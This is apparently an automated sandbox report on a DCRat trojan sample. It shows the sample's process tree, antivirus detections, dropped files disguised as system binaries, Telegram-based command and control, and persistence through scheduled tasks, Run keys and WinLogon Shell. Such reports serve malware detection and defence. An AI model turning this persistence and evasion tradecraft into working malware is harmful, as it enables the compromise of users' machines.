                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417539 Sample: H9gMIu2HXi.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 100 api.telegram.org 2->100 102 ipinfo.io 2->102 108 Snort IDS alert for network traffic 2->108 110 Antivirus detection for dropped file 2->110 112 Multi AV Scanner detection for dropped file 2->112 116 12 other signatures 2->116 14 H9gMIu2HXi.exe 14 2->14         started        17 winlogon.exe 2->17         started        19 winlogon.exe 2->19         started        22 6 other processes 2->22 signatures3 114 Uses the Telegram API (likely for C&C communication) 100->114 process4 file5 82 C:\Users\user\AppData\Local\Temp\...\work.exe, PE32 14->82 dropped 24 cmd.exe 1 14->24         started        84 C:\Users\user\Desktop\tRVOBpwv.log, PE32 17->84 dropped 86 C:\Users\user\Desktop\rGzNBWQu.log, PE32 17->86 dropped 88 C:\Users\user\Desktop\aEtIhTbg.log, PE32 17->88 dropped 90 3 other malicious files 17->90 dropped 26 cmd.exe 17->26         started        118 Antivirus detection for dropped file 19->118 120 Multi AV Scanner detection for dropped file 19->120 122 Machine Learning detection for dropped file 19->122 signatures6 process7 process8 28 work.exe 13 24->28         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        file9 80 C:\Users\user\AppData\Local\...\dwartg.exe, PE32 28->80 dropped 134 Multi AV Scanner detection for dropped file 28->134 36 dwartg.exe 3 10 28->36         started        signatures10 process11 file12 74 C:\Users\user\...\SurrogatewebSession.exe, PE32 36->74 dropped 76 C:\Users\user\AppData\Roaming\...\xIIr5uE.vbe, data 36->76 dropped 124 Antivirus detection for dropped file 36->124 126 Multi AV Scanner detection for dropped file 36->126 128 Machine Learning detection for dropped file 36->128 40 wscript.exe 1 36->40         started        signatures13 process14 signatures15 132 Windows Scripting host queries suspicious COM object (likely to drop second stage) 40->132 43 cmd.exe 1 40->43         started        process16 process17 45 SurrogatewebSession.exe 23 29 43->45         started        50 conhost.exe 43->50         started        dnsIp18 104 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 45->104 106 ipinfo.io 34.117.186.192, 443, 49730, 49731 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 45->106 92 C:\Users\user\Desktop\vybNluDs.log, PE32 45->92 dropped 94 C:\Users\user\Desktop\tnEMlbYs.log, PE32 45->94 dropped 96 C:\Users\user\Desktop\lKwWBiIK.log, PE32 45->96 dropped 98 10 other malicious files 45->98 dropped 136 Antivirus detection for dropped file 45->136 138 Multi AV Scanner detection for dropped file 45->138 140 Creates an undocumented autostart registry key 45->140 142 4 other signatures 45->142 52 csc.exe 45->52         started        56 cmd.exe 45->56         started        58 schtasks.exe 45->58         started        60 17 other processes 45->60 file19 signatures20 process21 file22 78 C:\Windows\...\SecurityHealthSystray.exe, PE32 52->78 dropped 130 Infects executable files (exe, dll, sys, html) 52->130 62 conhost.exe 52->62         started        64 cvtres.exe 52->64         started        66 conhost.exe 56->66         started        68 chcp.com 56->68         started        70 w32tm.exe 56->70         started        72 SurrogatewebSession.exe 56->72         started        signatures23 process24

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                H9gMIu2HXi.exe61%VirustotalBrowse
                                H9gMIu2HXi.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\Desktop\BudDliLc.log100%AviraHEUR/AGEN.1300079
                                C:\Users\user\Desktop\LdxTVLQK.log100%AviraTR/PSW.Agent.qngqt
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe100%AviraVBS/Runner.VPG
                                C:\Users\user\Desktop\MFrsFgjH.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe100%AviraVBS/Runner.VPG
                                C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat100%AviraBAT/Runner.IL
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%AviraHEUR/AGEN.1309961
                                C:\Recovery\winlogon.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\Desktop\vybNluDs.log100%AviraHEUR/AGEN.1300079
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%Joe Sandbox ML
                                C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\tRVOBpwv.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\tnEMlbYs.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\aEtIhTbg.log100%Joe Sandbox ML
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%Joe Sandbox ML
                                C:\Recovery\winlogon.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\TDfrhvdw.log100%Joe Sandbox ML
                                C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Recovery\winlogon.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe14%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe20%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe58%VirustotalBrowse
                                C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\BudDliLc.log17%ReversingLabs
                                C:\Users\user\Desktop\BudDliLc.log20%VirustotalBrowse
                                C:\Users\user\Desktop\LdxTVLQK.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Users\user\Desktop\LdxTVLQK.log69%VirustotalBrowse
                                C:\Users\user\Desktop\MFrsFgjH.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Users\user\Desktop\MFrsFgjH.log69%VirustotalBrowse
                                C:\Users\user\Desktop\RAtJMMZA.log10%ReversingLabs
                                C:\Users\user\Desktop\RAtJMMZA.log25%VirustotalBrowse
                                C:\Users\user\Desktop\TDfrhvdw.log8%ReversingLabs
                                C:\Users\user\Desktop\TDfrhvdw.log10%VirustotalBrowse
                                C:\Users\user\Desktop\WslZMRrk.log10%ReversingLabs
                                C:\Users\user\Desktop\WslZMRrk.log25%VirustotalBrowse
                                C:\Users\user\Desktop\aEtIhTbg.log8%ReversingLabs
                                C:\Users\user\Desktop\aEtIhTbg.log10%VirustotalBrowse
                                C:\Users\user\Desktop\lKwWBiIK.log0%ReversingLabs
                                C:\Users\user\Desktop\lKwWBiIK.log1%VirustotalBrowse
                                C:\Users\user\Desktop\rGzNBWQu.log0%ReversingLabs
                                C:\Users\user\Desktop\rGzNBWQu.log1%VirustotalBrowse
                                C:\Users\user\Desktop\tRVOBpwv.log8%ReversingLabs
                                C:\Users\user\Desktop\tRVOBpwv.log7%VirustotalBrowse
                                C:\Users\user\Desktop\tnEMlbYs.log8%ReversingLabs
                                C:\Users\user\Desktop\tnEMlbYs.log7%VirustotalBrowse

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                ipinfo.io
                                		34.117.186.192
                                		truefalse
                                  		high
                                  api.telegram.org
                                  		149.154.167.220
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://ipinfo.io/countryfalse
                                      		high
                                      https://ipinfo.io/ipfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://api.telegram.orgSurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botSurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.drfalse
                                            		high
                                            http://api.telegram.orgSurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ipinfo.ioSurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ipinfo.ioSurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    34.117.186.192
                                                    		ipinfo.ioUnited States
                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1417539
                                                    Start date and time:2024-03-29 15:26:04 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:49
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:H9gMIu2HXi.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
                                                    Detection:MAL
                                                    Classification:mal100.spre.troj.expl.evad.winEXE@60/41@2/2
                                                    EGA Information:
                                                    • Successful, ratio: 38.5%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 365
                                                    • Number of non-executed functions: 185
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 131217cm.n9shteam3.top, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7552 because it is empty
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7556 because it is empty
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7916 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7264 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7948 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7964 because it is empty
                                                    • Execution Graph export aborted for target winlogon.exe, PID 7532 because it is empty
                                                    • Execution Graph export aborted for target winlogon.exe, PID 7568 because it is empty
                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    14:26:55Task SchedulerRun new task: vXKtedDiKZHKptbUFqIBdHmZ path: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:26:55Task SchedulerRun new task: vXKtedDiKZHKptbUFqIBdHmZv path: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:26:57Task SchedulerRun new task: SurrogatewebSession path: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                    14:26:57Task SchedulerRun new task: SurrogatewebSessionS path: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                    14:26:57Task SchedulerRun new task: winlogon path: "C:\Recovery\winlogon.exe"
                                                    14:26:57Task SchedulerRun new task: winlogonw path: "C:\Recovery\winlogon.exe"
                                                    14:27:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:27:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                                    14:27:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                    14:27:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:27:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                                    14:27:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                    14:27:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:28:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                                    14:28:10AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                    14:28:28AutostartRun: WinLogon Shell "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:28:37AutostartRun: WinLogon Shell "C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    14:28:46AutostartRun: WinLogon Shell "C:\Recovery\winlogon.exe"
                                                    14:28:55AutostartRun: WinLogon Shell "C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                    15:26:49API Interceptor1x Sleep call for process: H9gMIu2HXi.exe modified
                                                    15:26:57API Interceptor28x Sleep call for process: SurrogatewebSession.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    34.117.186.192SecuriteInfo.com.Win32.Evo-gen.24318.16217.exeGet hashmaliciousUnknownBrowse
                                                    • ipinfo.io/json
                                                    SecuriteInfo.com.Win32.Evo-gen.28489.31883.exeGet hashmaliciousUnknownBrowse
                                                    • ipinfo.io/json
                                                    Raptor.HardwareService.Setup 1.msiGet hashmaliciousUnknownBrowse
                                                    • ipinfo.io/ip
                                                    Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                    • ipinfo.io/
                                                    Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                    • ipinfo.io/
                                                    w.shGet hashmaliciousXmrigBrowse
                                                    • /ip
                                                    Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                    • ipinfo.io/ip
                                                    Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                    • ipinfo.io/ip
                                                    uUsgzQ3DoW.exeGet hashmaliciousRedLineBrowse
                                                    • ipinfo.io/ip
                                                    8BZBgbeCcz.exeGet hashmaliciousRedLineBrowse
                                                    • ipinfo.io/ip
                                                    149.154.167.220SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                      SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                        SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                          x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                              iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                  https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                    lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                      JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ipinfo.ioInjectToolInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        MXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        XqC4Zcp8qg.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        3MdZ1WiAYP.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        7GofFHQDvk.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        88Oj06xDol.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        uQeIMs91Vh.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                        • 34.117.186.192
                                                                        jUlAlD6KHz.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        Iv88OQbqpE.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        api.telegram.orgSecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                        • 149.154.167.220
                                                                        aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                        • 149.154.167.220
                                                                        https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                        • 149.154.167.220
                                                                        lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TELEGRAMRUStealer.exeGet hashmaliciousEternity StealerBrowse
                                                                        • 149.154.167.99
                                                                        SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                        • 149.154.167.220
                                                                        aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                        • 149.154.167.220
                                                                        https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                        • 149.154.167.220
                                                                        lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://peleki5574.wixsite.com/service-authentificaGet hashmaliciousUnknownBrowse
                                                                        • 34.117.60.144
                                                                        InjectToolInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        MXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        l2ZKczbGRq.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                        • 34.117.186.192
                                                                        XqC4Zcp8qg.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        3MdZ1WiAYP.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        7GofFHQDvk.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        88Oj06xDol.exeGet hashmaliciousRisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        https://attwebupdate.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                        • 34.117.239.71
                                                                        uQeIMs91Vh.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                        • 34.117.186.192

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eoBMlky3Rkm7h5QK.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        BL-INVOICE SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        CamScanner.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        bhevLCQYD6.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        TBC#01 Rev.A3 - lnexa.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        package80171530600.jpg.lnkGet hashmaliciousXWormBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220
                                                                        ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 34.117.186.192
                                                                        • 149.154.167.220

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\Desktop\BudDliLc.logZT3pxe2Tb4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          O5OjRoFGIW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              7GTGpZi6oi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                GWCscceJsW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  QHZoYVBjSD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    qObijSd3Uj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      2EHDj2G1ow.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        UU5WXfH85a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          k6AIKkidxG.exeGet hashmaliciousDCRatBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Program Files (x86)\Java\jre-1.8\bin\client\8de7bf56f754b7

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with very long lines (928), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):928
                                                                                            Entropy (8bit):5.900812002528903
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:bkTkTW8E3WkCDyMlo9LqlkWekd1kp04g/6QjL0rAy:I4yRGkfcoIAkd1ktPrL
                                                                                            MD5:AA0C8943E0B56773A703A4F11FA3F426
                                                                                            SHA1:E455A72445E6EA44F6F7D64C5B67BFBB4CFBE531
                                                                                            SHA-256:E9C7BD39DA80B540175D4D6777FC004DA68BAE5755DCB0F016E82CADDB89583D
